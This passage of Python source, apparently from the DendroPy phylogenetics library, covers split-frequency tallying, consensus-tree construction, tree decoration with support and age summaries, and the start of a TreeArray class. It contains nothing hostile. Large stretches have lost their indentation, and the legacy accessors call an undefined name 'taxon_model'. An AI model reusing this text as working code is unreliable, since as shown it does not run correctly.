                ultrametricity_precision=self.ultrametricity_precision,
                is_force_max_age=self.is_force_max_age,
                is_force_min_age=self.is_force_min_age,
                set_node_age_fn=set_node_age_fn,
                )
    # Each split on this tree contributes the tree's weight (1.0 when
    # weights are absent or disabled).
    if tree.weight is not None and self.use_tree_weights:
        weight_to_use = float(tree.weight)
    else:
        weight_to_use = 1.0
    self.sum_of_tree_weights += weight_to_use
    if tree.is_rooted:
        self.tree_rooting_types_counted.add(True)
    else:
        self.tree_rooting_types_counted.add(False)
    if not is_bipartitions_updated:
        tree.encode_bipartitions()
    splits = []
    edge_lengths = []
    node_ages = []
    for bipartition in tree.bipartition_encoding:
        split = bipartition.split_bitmask
        ## if edge is stored as an attribute, might be faster to:
        # edge = bipartition.edge
        edge = tree.bipartition_edge_map[bipartition]
        splits.append(split)
        self.split_counts[split] += weight_to_use
        if not self.ignore_edge_lengths:
            # Record this edge's length (or the default) under its split.
            sel = self.split_edge_lengths.setdefault(split,[])
            if edge.length is None:
                elen = default_edge_length_value
            else:
                elen = edge.length
            sel.append(elen)
            edge_lengths.append(elen)
        else:
            sel = None
        if not self.ignore_node_ages:
            # Record the head node's age (None when there is no head node).
            sna = self.split_node_ages.setdefault(split, [])
            if edge.head_node is not None:
                nage = edge.head_node.age
            else:
                nage = None
            sna.append(nage)
            node_ages.append(nage)
        else:
            sna = None
    return splits, edge_lengths, node_ages
def splits_considered(self):
    """
    Return a 4-tuple summarizing the splits tallied so far:

        (total weighted count over all splits,
         number of distinct splits,
         total weighted count over non-trivial splits,
         number of distinct non-trivial splits)
    """
    if not self.split_counts:
        return 0, 0, 0, 0
    taxa_mask = self.taxon_namespace.all_taxa_bitmask()
    total_weight = 0
    distinct = 0
    nontrivial_weight = 0
    nontrivial_distinct = 0
    for split_bitmask, weight in self.split_counts.items():
        distinct += 1
        total_weight += weight
        if not treemodel.Bipartition.is_trivial_bitmask(split_bitmask, taxa_mask):
            nontrivial_distinct += 1
            nontrivial_weight += weight
    return total_weight, distinct, nontrivial_weight, nontrivial_distinct
def calc_freqs(self):
    """
    Forces recalculation of the split-frequency map.

    Counts are normalized by ``calc_normalization_weight()`` (the sum of
    tree weights when nonzero, otherwise the number of trees counted);
    when no trees have been counted at all, every known split is
    assigned a frequency of 1.0. Also records the tree count the
    frequencies correspond to and invalidates the cached edge-length and
    node-age summaries. Returns the new frequency map.

    Cleanup: the original body bound an unused local (``count``) on each
    loop iteration; it has been removed.
    """
    self._split_freqs = {}
    if self.total_trees_counted == 0:
        for split in self.split_counts:
            self._split_freqs[split] = 1.0
    else:
        normalization_weight = self.calc_normalization_weight()
        for split in self.split_counts:
            self._split_freqs[split] = float(self.split_counts[split]) / normalization_weight
    self._trees_counted_for_freqs = self.total_trees_counted
    self._split_edge_length_summaries = None
    self._split_node_age_summaries = None
    return self._split_freqs
def calc_normalization_weight(self):
    """
    Return the divisor for converting split counts into frequencies: the
    accumulated sum of tree weights when it is nonzero, otherwise the
    number of trees counted.
    """
    if self.sum_of_tree_weights:
        return float(self.sum_of_tree_weights)
    return self.total_trees_counted
def update(self, split_dist):
    """
    Merge the counts, weights, rooting states, edge lengths, and node
    ages accumulated in ``split_dist`` into ``self``, invalidating all
    cached summaries.
    """
    self.total_trees_counted += split_dist.total_trees_counted
    self.sum_of_tree_weights += split_dist.sum_of_tree_weights
    self._split_edge_length_summaries = None
    self._split_node_age_summaries = None
    self._trees_counted_for_summaries = 0
    self.tree_rooting_types_counted.update(split_dist.tree_rooting_types_counted)
    for split in split_dist.split_counts:
        self.split_counts[split] += split_dist.split_counts[split]
        # NOTE: these defaultdict lookups create empty-list entries in
        # ``split_dist`` for splits it has no lengths/ages recorded for.
        self.split_edge_lengths[split] += split_dist.split_edge_lengths[split]
        self.split_node_ages[split] += split_dist.split_node_ages[split]
###########################################################################
### Basic Information Access
def __len__(self):
    # Number of distinct splits recorded.
    return len(self.split_counts)
def __iter__(self):
    # Iterate over recorded split bitmasks.
    for s in self.split_counts:
        yield s
def __getitem__(self, split_bitmask):
    """
    Returns frequency of split_bitmask (0.0 when never recorded).
    """
    return self._get_split_frequencies().get(split_bitmask, 0.0)
def _get_split_frequencies(self):
    # Lazily (re)compute frequencies when missing or stale.
    if self._split_freqs is None or self._trees_counted_for_freqs != self.total_trees_counted:
        self.calc_freqs()
    return self._split_freqs
split_frequencies = property(_get_split_frequencies)
def is_mixed_rootings_counted(self):
    # True when both rooted and unrooted/unknown-rooting trees were counted.
    return ( (True in self.tree_rooting_types_counted)
            and (False in self.tree_rooting_types_counted or None in self.tree_rooting_types_counted) )
def is_all_counted_trees_rooted(self):
    # True when every counted tree was rooted.
    return (True in self.tree_rooting_types_counted) and (len(self.tree_rooting_types_counted) == 1)
def is_all_counted_trees_strictly_unrooted(self):
    # True when every counted tree was explicitly unrooted.
    return (False in self.tree_rooting_types_counted) and (len(self.tree_rooting_types_counted) == 1)
def is_all_counted_trees_treated_as_unrooted(self):
    # True when no counted tree was rooted (unrooted or unknown only).
    return True not in self.tree_rooting_types_counted
###########################################################################
### Summarization
def split_support_iter(self,
        tree,
        is_bipartitions_updated=False,
        include_external_splits=False,
        traversal_strategy="preorder",
        node_support_attr_name=None,
        edge_support_attr_name=None,
        ):
    """
    Returns iterator over support values for the splits of a given tree,
    where the support value is given by the proportional frequency of the
    split in the current split distribution.

    Parameters
    ----------
    tree : |Tree|
        The |Tree| which will be scored.
    is_bipartitions_updated : bool
        If |False| [default], then the tree will have its splits encoded or
        updated. Otherwise, if |True|, then the tree is assumed to have its
        splits already encoded and updated.
    include_external_splits : bool
        If |True|, then non-internal split posteriors will be included.
        If |False|, then these are skipped. This should only make a
        difference when dealing with splits collected from trees of
        different leaf sets.
    traversal_strategy : str
        One of: "preorder" or "postorder". Specfies order in which splits
        are visited.

    Yields
    ------
    support : float
        For each visited split, the proportional frequency with which
        the split is found in the current distribution.
    """
    # NOTE(review): ``node_support_attr_name`` and
    # ``edge_support_attr_name`` are accepted but not used in this
    # body — confirm whether attribute-setting was intended here.
    if traversal_strategy == "preorder":
        if include_external_splits:
            iter_fn = tree.preorder_node_iter
        else:
            iter_fn = tree.preorder_internal_node_iter
    elif traversal_strategy == "postorder":
        if include_external_splits:
            iter_fn = tree.postorder_node_iter
        else:
            iter_fn = tree.postorder_internal_node_iter
    else:
        raise ValueError("Traversal strategy not supported: '{}'".format(traversal_strategy))
    if not is_bipartitions_updated:
        tree.encode_bipartitions()
    split_frequencies = self._get_split_frequencies()
    for nd in iter_fn():
        split = nd.edge.split_bitmask
        # Unseen splits yield a support of 0.0.
        support = split_frequencies.get(split, 0.0)
        yield support
def calc_split_edge_length_summaries(self):
self._split_edge_length_summaries = {}
for split, elens in self.split_edge_lengths.items():
if not elens:
continue
try:
self._split_edge_length_summaries[split] = statistics.summarize(elens)
except ValueError:
pass
return self._split_edge_length_summaries
def calc_split_node_age_summaries(self):
self._split_node_age_summaries = {}
for split, ages in self.split_node_ages.items():
if not ages:
continue
try:
self._split_node_age_summaries[split] = statistics.summarize(ages)
except ValueError:
pass
return self._split_node_age_summaries
def _set_node_age(self, nd):
if nd.taxon is None or nd._child_nodes:
return None
else:
return self.taxon_label_age_map.get(nd.taxon.label, 0.0)
def _get_split_edge_length_summaries(self):
if self._split_edge_length_summaries is None \
or self._trees_counted_for_summaries != self.total_trees_counted:
self.calc_split_edge_length_summaries()
return self._split_edge_length_summaries
split_edge_length_summaries = property(_get_split_edge_length_summaries)
def _get_split_node_age_summaries(self):
if self._split_node_age_summaries is None \
or self._trees_counted_for_summaries != self.total_trees_counted:
self.calc_split_node_age_summaries()
return self._split_node_age_summaries
split_node_age_summaries = property(_get_split_node_age_summaries)
def log_product_of_split_support_on_tree(self,
tree,
is_bipartitions_updated=False,
include_external_splits=False,
):
"""
Calculates the (log) product of the support of the splits of the
tree, where the support is given by the proportional frequency of the
split in the current split distribution.
The tree that has the highest product of split support out of a sample
of trees corresponds to the "maximum credibility tree" for that sample.
This can also be referred to as the "maximum clade credibility tree",
though this latter term is sometimes use for the tree that has the
highest *sum* of split support (see
:meth:`SplitDistribution.sum_of_split_support_on_tree()`).
Parameters
----------
tree : |Tree|
The tree for which the score should be calculated.
is_bipartitions_updated : bool
If |True|, then the splits are assumed to have already been encoded
and will not be updated on the trees.
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : numeric
The log product of the support of the splits of the tree.
"""
log_product_of_split_support = 0.0
for split_support in self.split_support_iter(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
include_external_splits=include_external_splits,
traversal_strategy="preorder",
):
if split_support:
log_product_of_split_support += math.log(split_support)
return log_product_of_split_support
def sum_of_split_support_on_tree(self,
tree,
is_bipartitions_updated=False,
include_external_splits=False,
):
"""
Calculates the sum of the support of the splits of the tree, where the
support is given by the proportional frequency of the split in the
current distribtion.
Parameters
----------
tree : |Tree|
The tree for which the score should be calculated.
is_bipartitions_updated : bool
If |True|, then the splits are assumed to have already been encoded
and will not be updated on the trees.
include_external_splits : bool
If |True|, then non-internal split posteriors will be included in
the score. Defaults to |False|: these are skipped. This should only
make a difference when dealing with splits collected from trees of
different leaf sets.
Returns
-------
s : numeric
The sum of the support of the splits of the tree.
"""
sum_of_split_support = 0.0
for split_support in self.split_support_iter(
tree=tree,
is_bipartitions_updated=is_bipartitions_updated,
include_external_splits=include_external_splits,
traversal_strategy="preorder",
):
sum_of_split_support += split_support
return sum_of_split_support
def collapse_edges_with_less_than_minimum_support(self,
tree,
min_freq=constants.GREATER_THAN_HALF,
):
"""
Collapse edges on tree that have support less than indicated by
``min_freq``.
"""
if not tree.is_rooted and self.is_all_counted_trees_rooted():
raise ValueError("Tree is interpreted as unrooted, but split support is based on rooted trees")
elif tree.is_rooted and self.is_all_counted_trees_treated_as_unrooted():
raise ValueError("Tree is interpreted as rooted, but split support is based on unrooted trees")
tree.encode_bipartitions()
split_frequencies = self._get_split_frequencies()
to_collapse = []
for nd in tree.postorder_node_iter():
s = nd.edge.bipartition.split_bitmask
if s not in split_frequencies:
to_collapse.append(nd)
elif split_frequencies[s] < min_freq:
to_collapse.append(nd)
for nd in to_collapse:
nd.edge.collapse(adjust_collapsed_head_children_edge_lengths=True)
    def consensus_tree(self,
            min_freq=constants.GREATER_THAN_HALF,
            is_rooted=None,
            summarize_splits=True,
            **split_summarization_kwargs
            ):
        """
        Returns a consensus tree from splits in ``self``.
        Parameters
        ----------
        min_freq : real
            The minimum frequency of a split in this distribution for it to be
            added to the tree. If |None|, all splits are candidates.
        is_rooted : bool
            Should tree be rooted or not? If *all* trees counted for splits are
            explicitly rooted or unrooted, then this will default to |True| or
            |False|, respectively. Otherwise it defaults to |None|.
        \*\*split_summarization_kwargs : keyword arguments
            These will be passed directly to the underlying
            `SplitDistributionSummarizer` object. See
            :meth:`SplitDistributionSummarizer.configure` for options.
        Returns
        -------
        t : consensus tree
        """
        if is_rooted is None:
            # Infer the rooting state only when it is unambiguous across all
            # counted trees; otherwise leave it as None.
            if self.is_all_counted_trees_rooted():
                is_rooted = True
            elif self.is_all_counted_trees_strictly_unrooted():
                is_rooted = False
        split_frequencies = self._get_split_frequencies()
        to_try_to_add = []
        # Tolerance-based comparison with 1.0 to absorb floating-point error
        # in frequencies of splits that occur in (almost) every tree.
        _almost_one = lambda x: abs(x - 1.0) <= 0.0000001
        for s in split_frequencies:
            freq = split_frequencies[s]
            # The _almost_one clause admits splits with frequency ~1.0 when
            # min_freq is also ~1.0, even if freq < min_freq numerically.
            if (min_freq is None) or (freq >= min_freq) or (_almost_one(min_freq) and _almost_one(freq)):
                to_try_to_add.append((freq, s))
        # Sort candidate splits in descending order of frequency before
        # handing them off to tree construction -- presumably so that
        # higher-frequency splits take precedence when later splits are
        # incompatible; confirm against Tree.from_split_bitmasks.
        to_try_to_add.sort(reverse=True)
        splits_for_tree = [i[1] for i in to_try_to_add]
        con_tree = treemodel.Tree.from_split_bitmasks(
                split_bitmasks=splits_for_tree,
                taxon_namespace=self.taxon_namespace,
                is_rooted=is_rooted)
        if summarize_splits:
            self.summarize_splits_on_tree(
                tree=con_tree,
                is_bipartitions_updated=False,
                **split_summarization_kwargs
                )
        return con_tree
def summarize_splits_on_tree(self,
tree,
is_bipartitions_updated=False,
**split_summarization_kwargs
):
"""
Summarizes support of splits/edges/node on tree.
Parameters
----------
tree: |Tree| instance
Tree to be decorated with support values.
is_bipartitions_updated: bool
If |True|, then bipartitions will not be recalculated.
\*\*split_summarization_kwargs : keyword arguments
These will be passed directly to the underlying
`SplitDistributionSummarizer` object. See
:meth:`SplitDistributionSummarizer.configure` for options.
"""
if self.taxon_namespace is not tree.taxon_namespace:
raise error.TaxonNamespaceIdentityError(self, tree)
if self.tree_decorator is None:
self.tree_decorator = SplitDistributionSummarizer()
self.tree_decorator.configure(**split_summarization_kwargs)
self.tree_decorator.summarize_splits_on_tree(
split_distribution=self,
tree=tree,
is_bipartitions_updated=is_bipartitions_updated)
return tree
###########################################################################
### legacy
def _get_taxon_set(self):
from dendropy import taxonmodel
taxon_model.taxon_set_deprecation_warning()
return self.taxon_namespace
def _set_taxon_set(self, v):
from dendropy import taxonmodel
taxon_model.taxon_set_deprecation_warning()
self.taxon_namespace = v
def _del_taxon_set(self):
from dendropy import taxonmodel
taxon_model.taxon_set_deprecation_warning()
taxon_set = property(_get_taxon_set, _set_taxon_set, _del_taxon_set)
###############################################################################
### SplitDistributionSummarizer
class SplitDistributionSummarizer(object):
    """
    Decorates a tree with information drawn from a |SplitDistribution|:
    split support values, node-age and edge-length summary statistics, and
    (optionally) edge lengths derived from the distribution.
    """

    def __init__(self, **kwargs):
        """
        See :meth:`SplitDistributionSummarizer.configure` for configuration
        options.
        """
        self.configure(**kwargs)

    def configure(self, **kwargs):
        """
        Configure rendition/mark-up.
        Parameters
        ----------
        set_edge_lengths : string
            For each edge, set the length based on:
            - "support": use support values split corresponding to edge
            - "mean-length": mean of edge lengths for split
            - "median-length": median of edge lengths for split
            - "mean-age": such that split age is equal to mean of ages
            - "median-age": such that split age is equal to mean of ages
            - "keep": do not modify edge lengths
            - "clear": set all edge lengths to |None|
            - |None|: do not set edge lengths
        add_support_as_node_attribute: bool
            Adds each node's support value as an attribute of the node,
            "``support``".
        add_support_as_node_annotation: bool
            Adds support as a metadata annotation, "``support``". If
            ``add_support_as_node_attribute`` is |True|, then the value will be
            dynamically-bound to the value of the node's "``support``" attribute.
        set_support_as_node_label : bool
            Sets the ``label`` attribute of each node to the support value.
        add_node_age_summaries_as_node_attributes: bool
            Summarizes the distribution of the ages of each node in the
            following attributes:
            - ``age_mean``
            - ``age_median``
            - ``age_sd``
            - ``age_hpd95``
            - ``age_range``
        add_node_age_summaries_as_node_annotations: bool
            Summarizes the distribution of the ages of each node in the
            following metadata annotations:
            - ``age_mean``
            - ``age_median``
            - ``age_sd``
            - ``age_hpd95``
            - ``age_range``
            If ``add_node_age_summaries_as_node_attributes`` is |True|, then the
            values will be dynamically-bound to the corresponding node
            attributes.
        add_edge_length_summaries_as_edge_attributes: bool
            Summarizes the distribution of the lengths of each edge in the
            following attributes:
            - ``length_mean``
            - ``length_median``
            - ``length_sd``
            - ``length_hpd95``
            - ``length_range``
        add_edge_length_summaries_as_edge_annotations: bool
            Summarizes the distribution of the lengths of each edge in the
            following metadata annotations:
            - ``length_mean``
            - ``length_median``
            - ``length_sd``
            - ``length_hpd95``
            - ``length_range``
            If ``add_edge_length_summaries_as_edge_attributes`` is |True|, then the
            values will be dynamically-bound to the corresponding edge
            attributes.
        support_label_decimals: int
            Number of decimal places to express when rendering the support
            value as a string for the node label.
        support_as_percentages: bool
            Whether or not to express the support value as percentages (default
            is probability or proportion).
        minimum_edge_length : numeric
            All edge lengths calculated to have a value less than this will be
            set to this.
        error_on_negative_edge_lengths : bool
            If |True|, an inferred edge length that is less than 0 will result
            in a ValueError.

        Raises
        ------
        TypeError
            If any unrecognized keyword arguments remain after processing.
        """
        self.set_edge_lengths = kwargs.pop("set_edge_lengths", None)
        self.add_support_as_node_attribute = kwargs.pop("add_support_as_node_attribute", True)
        self.add_support_as_node_annotation = kwargs.pop("add_support_as_node_annotation", True)
        self.set_support_as_node_label = kwargs.pop("set_support_as_node_label", None)
        self.add_node_age_summaries_as_node_attributes = kwargs.pop("add_node_age_summaries_as_node_attributes", True)
        self.add_node_age_summaries_as_node_annotations = kwargs.pop("add_node_age_summaries_as_node_annotations", True)
        self.add_edge_length_summaries_as_edge_attributes = kwargs.pop("add_edge_length_summaries_as_edge_attributes", True)
        self.add_edge_length_summaries_as_edge_annotations = kwargs.pop("add_edge_length_summaries_as_edge_annotations", True)
        self.support_label_decimals = kwargs.pop("support_label_decimals", 4)
        self.support_as_percentages = kwargs.pop("support_as_percentages", False)
        self.support_label_compose_fn = kwargs.pop("support_label_compose_fn", None)
        self.primary_fieldnames = ["support",]
        self.summary_stats_fieldnames = SplitDistribution.SUMMARY_STATS_FIELDNAMES
        # Fallback values when a split has no data for a given statistic;
        # list-valued statistics get empty lists, scalars default to 0.0 at
        # lookup time.
        self.no_data_values = {
                'hpd95': [],
                'quant_5_95': [],
                'range': [],
                }
        self.node_age_summaries_fieldnames = list("age_{}".format(f) for f in self.summary_stats_fieldnames)
        self.edge_length_summaries_fieldnames = list("length_{}".format(f) for f in self.summary_stats_fieldnames)
        self.fieldnames = self.primary_fieldnames + self.node_age_summaries_fieldnames + self.edge_length_summaries_fieldnames
        for fieldname in self.fieldnames:
            setattr(self, "{}_attr_name".format(fieldname), kwargs.pop("{}_attr_name".format(fieldname), fieldname))
            setattr(self, "{}_annotation_name".format(fieldname), kwargs.pop("{}_annotation_name".format(fieldname), fieldname))
            setattr(self, "is_{}_annotation_dynamic".format(fieldname), kwargs.pop("is_{}_annotation_dynamic".format(fieldname), True))
        self.minimum_edge_length = kwargs.pop("minimum_edge_length", None)
        self.error_on_negative_edge_lengths = kwargs.pop("error_on_negative_edge_lengths", False)
        if kwargs:
            # Fix: the TypeError was previously constructed but never raised,
            # so unrecognized arguments were silently ignored.
            raise TypeError("Unrecognized or unsupported arguments: {}".format(kwargs))

    def _decorate(self,
            target,
            fieldname,
            value,
            set_attribute,
            set_annotation,
            ):
        """
        Set ``value`` on ``target`` (a node or an edge) as an attribute
        and/or a metadata annotation, using the names configured for
        ``fieldname``.
        """
        attr_name = getattr(self, "{}_attr_name".format(fieldname))
        annotation_name = getattr(self, "{}_annotation_name".format(fieldname))
        if set_attribute:
            setattr(target, attr_name, value)
            if set_annotation:
                target.annotations.drop(name=annotation_name)
                if getattr(self, "is_{}_annotation_dynamic".format(fieldname)):
                    # Dynamic annotations track the attribute's current value.
                    target.annotations.add_bound_attribute(
                            attr_name=attr_name,
                            annotation_name=annotation_name,
                            )
                else:
                    target.annotations.add_new(
                            name=annotation_name,
                            value=value,
                            )
        elif set_annotation:
            target.annotations.drop(name=annotation_name)
            target.annotations.add_new(
                    name=annotation_name,
                    value=value,
                    )

    def summarize_splits_on_tree(self,
            split_distribution,
            tree,
            is_bipartitions_updated=False):
        """
        Decorate ``tree`` with support values, age/length summaries, and
        (optionally) edge lengths taken from ``split_distribution``,
        according to the current configuration. Returns ``tree``.
        """
        if split_distribution.taxon_namespace is not tree.taxon_namespace:
            raise error.TaxonNamespaceIdentityError(split_distribution, tree)
        if not is_bipartitions_updated:
            tree.encode_bipartitions()
        if self.support_label_compose_fn is not None:
            support_label_fn = lambda freq: self.support_label_compose_fn(freq)
        else:
            support_label_fn = lambda freq: "{:.{places}f}".format(freq, places=self.support_label_decimals)
        node_age_summaries = split_distribution.split_node_age_summaries
        edge_length_summaries = split_distribution.split_edge_length_summaries
        split_freqs = split_distribution.split_frequencies
        assert len(self.node_age_summaries_fieldnames) == len(self.summary_stats_fieldnames)
        for node in tree:
            split_bitmask = node.edge.bipartition.split_bitmask
            # Splits never seen in the distribution get zero support.
            split_support = split_freqs.get(split_bitmask, 0.0)
            if self.support_as_percentages:
                split_support = split_support * 100
            self._decorate(
                target=node,
                fieldname="support",
                value=split_support,
                set_attribute=self.add_support_as_node_attribute,
                set_annotation=self.add_support_as_node_annotation,
                )
            if self.set_support_as_node_label:
                node.label = support_label_fn(split_support)
            if (self.add_node_age_summaries_as_node_attributes or self.add_node_age_summaries_as_node_annotations) and node_age_summaries:
                for fieldname, stats_fieldname in zip(self.node_age_summaries_fieldnames, self.summary_stats_fieldnames):
                    no_data_value = self.no_data_values.get(stats_fieldname, 0.0)
                    if not node_age_summaries or split_bitmask not in node_age_summaries:
                        value = no_data_value
                    else:
                        value = node_age_summaries[split_bitmask].get(stats_fieldname, no_data_value)
                    self._decorate(
                        target=node,
                        fieldname=fieldname,
                        value=value,
                        set_attribute=self.add_node_age_summaries_as_node_attributes,
                        set_annotation=self.add_node_age_summaries_as_node_annotations,
                        )
            if (self.add_edge_length_summaries_as_edge_attributes or self.add_edge_length_summaries_as_edge_annotations) and edge_length_summaries:
                for fieldname, stats_fieldname in zip(self.edge_length_summaries_fieldnames, self.summary_stats_fieldnames):
                    no_data_value = self.no_data_values.get(stats_fieldname, 0.0)
                    if not edge_length_summaries or split_bitmask not in edge_length_summaries:
                        value = no_data_value
                    else:
                        value = edge_length_summaries[split_bitmask].get(stats_fieldname, no_data_value)
                    self._decorate(
                        target=node.edge,
                        fieldname=fieldname,
                        value=value,
                        set_attribute=self.add_edge_length_summaries_as_edge_attributes,
                        set_annotation=self.add_edge_length_summaries_as_edge_annotations,
                        )
            if self.set_edge_lengths is None:
                pass
            elif self.set_edge_lengths == "keep":
                pass
            elif self.set_edge_lengths == "support":
                node.edge.length = split_support
            elif self.set_edge_lengths == "clear":
                # Fix: previously assigned to undefined name ``edge``.
                node.edge.length = None
            elif self.set_edge_lengths in ("mean-age", "median-age"):
                if not node_age_summaries:
                    raise ValueError("Node ages not available")
                if self.set_edge_lengths == "mean-age":
                    try:
                        node.age = node_age_summaries[split_bitmask]["mean"]
                    except KeyError:
                        node.age = self.no_data_values.get("mean", 0.0)
                elif self.set_edge_lengths == "median-age":
                    try:
                        node.age = node_age_summaries[split_bitmask]["median"]
                    except KeyError:
                        node.age = self.no_data_values.get("median", 0.0)
                else:
                    raise ValueError(self.set_edge_lengths)
            elif self.set_edge_lengths in ("mean-length", "median-length"):
                if not edge_length_summaries:
                    raise ValueError("Edge lengths not available")
                if self.set_edge_lengths == "mean-length":
                    try:
                        node.edge.length = edge_length_summaries[split_bitmask]["mean"]
                    except KeyError:
                        node.edge.length = self.no_data_values.get("mean", 0.0)
                elif self.set_edge_lengths == "median-length":
                    try:
                        node.edge.length = edge_length_summaries[split_bitmask]["median"]
                    except KeyError:
                        node.edge.length = self.no_data_values.get("median", 0.0)
                else:
                    raise ValueError(self.set_edge_lengths)
                # Fix: previously read/assigned undefined name ``edge``.
                if self.minimum_edge_length is not None and node.edge.length < self.minimum_edge_length:
                    node.edge.length = self.minimum_edge_length
            else:
                raise ValueError(self.set_edge_lengths)
        if self.set_edge_lengths in ("mean-age", "median-age"):
            # Ages were assigned per node above; convert them to edge lengths
            # in a single pass over the whole tree.
            tree.set_edge_lengths_from_node_ages(
                    minimum_edge_length=self.minimum_edge_length,
                    error_on_negative_edge_lengths=self.error_on_negative_edge_lengths)
        elif self.set_edge_lengths not in ("keep", "clear", None) and self.minimum_edge_length is not None:
            # Final clamp so no edge ends up below the configured minimum.
            for node in tree:
                if node.edge.length is None:
                    node.edge.length = self.minimum_edge_length
                elif node.edge.length < self.minimum_edge_length:
                    node.edge.length = self.minimum_edge_length
        return tree
###############################################################################
### TreeArray
class TreeArray(
taxonmodel.TaxonNamespaceAssociated,
basemodel.MultiReadable,
):
"""
High-performance collection of tree structures.
Storage of minimal tree structural information as represented by toplogy
and edge lengths, minimizing memory and processing time.
This class stores trees as collections of splits and edge lengths. All
other information, such as labels, metadata annotations, etc. will be
discarded. A full |Tree| instance can be reconstructed as needed
from the structural information stored by this class, at the cost of
computation time.
"""
    class IncompatibleTreeArrayUpdate(Exception):
        """Base error: update from a structurally incompatible |TreeArray|."""
        pass
    class IncompatibleRootingTreeArrayUpdate(IncompatibleTreeArrayUpdate):
        """Raised when the source array's rooting state differs."""
        pass
    class IncompatibleEdgeLengthsTreeArrayUpdate(IncompatibleTreeArrayUpdate):
        """Raised when the source array's ``ignore_edge_lengths`` setting differs."""
        pass
    class IncompatibleNodeAgesTreeArrayUpdate(IncompatibleTreeArrayUpdate):
        """Raised when the source array's ``ignore_node_ages`` setting differs."""
        pass
    class IncompatibleTreeWeightsTreeArrayUpdate(IncompatibleTreeArrayUpdate):
        """Raised when the source array's ``use_tree_weights`` setting differs."""
        pass
##############################################################################
## Factory Function
@classmethod
def from_tree_list(cls,
trees,
is_rooted_trees=None,
ignore_edge_lengths=False,
ignore_node_ages=True,
use_tree_weights=True,
ultrametricity_precision=constants.DEFAULT_ULTRAMETRICITY_PRECISION,
is_force_max_age=None,
taxon_label_age_map=None,
is_bipartitions_updated=False,
):
taxon_namespace = trees.taxon_namespace
ta = cls(
taxon_namespace=taxon_namespace,
is_rooted_trees=is_rooted_trees,
ignore_edge_lengths=ignore_edge_lengths,
ignore_node_ages=ignore_node_ages,
use_tree_weights=use_tree_weights,
ultrametricity_precision=ultrametricity_precision,
is_force_max_age=is_force_max_age,
taxon_label_age_map=taxon_label_age_map,
)
ta.add_trees(
trees=trees,
is_bipartitions_updated=is_bipartitions_updated)
return ta
##############################################################################
## Life-Cycle
    def __init__(self,
            taxon_namespace=None,
            is_rooted_trees=None,
            ignore_edge_lengths=False,
            ignore_node_ages=True,
            use_tree_weights=True,
            ultrametricity_precision=constants.DEFAULT_ULTRAMETRICITY_PRECISION,
            is_force_max_age=None,
            taxon_label_age_map=None,
            ):
        """
        Parameters
        ----------
        taxon_namespace : |TaxonNamespace|
            The operational taxonomic unit concept namespace to manage taxon
            references.
        is_rooted_trees : bool
            If not set, then it will be set based on the rooting state of the
            first tree added. If |True|, then trying to add an unrooted tree
            will result in an error. If |False|, then trying to add a rooted
            tree will result in an error.
        ignore_edge_lengths : bool
            If |True|, then edge lengths of splits will not be stored. If
            |False|, then edge lengths will be stored.
        ignore_node_ages : bool
            If |True|, then node ages of splits will not be stored. If
            |False|, then node ages will be stored.
        use_tree_weights : bool
            If |False|, then tree weights will not be used to weight splits.
        ultrametricity_precision : numeric
            Passed through to the underlying |SplitDistribution| for node-age
            calculations.
        is_force_max_age : bool
            Passed through to the underlying |SplitDistribution|; presumably
            controls forcing of maximum node ages -- confirm against
            SplitDistribution's documentation.
        taxon_label_age_map : dict
            Passed through to the underlying |SplitDistribution|; maps taxon
            labels to externally-specified leaf ages.
        """
        taxonmodel.TaxonNamespaceAssociated.__init__(self,
                taxon_namespace=taxon_namespace)
        # Configuration
        self._is_rooted_trees = is_rooted_trees
        self.ignore_edge_lengths = ignore_edge_lengths
        self.ignore_node_ages = ignore_node_ages
        self.use_tree_weights = use_tree_weights
        self.default_edge_length_value = 0 # edge.length of |None| gets this value
        self.tree_type = treemodel.Tree
        self.taxon_label_age_map = taxon_label_age_map
        # Storage: parallel per-tree lists, kept index-aligned by
        # add_tree()/update()/extend().
        self._tree_split_bitmasks = []
        self._tree_edge_lengths = []
        self._tree_leafset_bitmasks = []
        self._tree_weights = []
        # Aggregated split counts/statistics across all accessioned trees.
        self._split_distribution = SplitDistribution(
                taxon_namespace=self.taxon_namespace,
                ignore_edge_lengths=self.ignore_edge_lengths,
                ignore_node_ages=self.ignore_node_ages,
                ultrametricity_precision=ultrametricity_precision,
                is_force_max_age=is_force_max_age,
                taxon_label_age_map=self.taxon_label_age_map,
                )
##############################################################################
## Book-Keeping
def _get_is_rooted_trees(self):
return self._is_rooted_trees
is_rooted_trees = property(_get_is_rooted_trees)
def _get_split_distribution(self):
return self._split_distribution
split_distribution = property(_get_split_distribution)
def validate_rooting(self, rooting_of_other):
if self._is_rooted_trees is None:
self._is_rooted_trees = rooting_of_other
elif self._is_rooted_trees != rooting_of_other:
if self._is_rooted_trees:
ta = "rooted"
t = "unrooted"
else:
ta = "unrooted"
t = "rooted"
raise error.MixedRootingError("Cannot add {tree_rooting} tree to TreeArray with {tree_array_rooting} trees".format(
tree_rooting=t,
tree_array_rooting=ta))
##############################################################################
## Updating from Another TreeArray
def update(self, other):
if len(self) > 0:
# self.validate_rooting(other._is_rooted_trees)
if self._is_rooted_trees is not other._is_rooted_trees:
raise TreeArray.IncompatibleRootingTreeArrayUpdate("Updating from incompatible TreeArray: 'is_rooted_trees' should be '{}', but is instead '{}'".format(other._is_rooted_trees, self._is_rooted_trees, ))
if self.ignore_edge_lengths is not other.ignore_edge_lengths:
raise TreeArray.IncompatibleEdgeLengthsTreeArrayUpdate("Updating from incompatible TreeArray: 'ignore_edge_lengths' is not: {} ".format(other.ignore_edge_lengths, self.ignore_edge_lengths, ))
if self.ignore_node_ages is not other.ignore_node_ages:
raise TreeArray.IncompatibleNodeAgesTreeArrayUpdate("Updating from incompatible TreeArray: 'ignore_node_ages' should be '{}', but is instead '{}'".format(other.ignore_node_ages, self.ignore_node_ages))
if self.use_tree_weights is not other.use_tree_weights:
raise TreeArray.IncompatibleTreeWeightsTreeArrayUpdate("Updating from incompatible TreeArray: 'use_tree_weights' should be '{}', but is instead '{}'".format(other.use_tree_weights, self.use_tree_weights))
else:
self._is_rooted_trees = other._is_rooted_trees
self.ignore_edge_lengths = other.ignore_edge_lengths
self.ignore_node_ages = other.ignore_node_ages
self.use_tree_weights = other.use_tree_weights
self._tree_split_bitmasks.extend(other._tree_split_bitmasks)
self._tree_edge_lengths.extend(other._tree_edge_lengths)
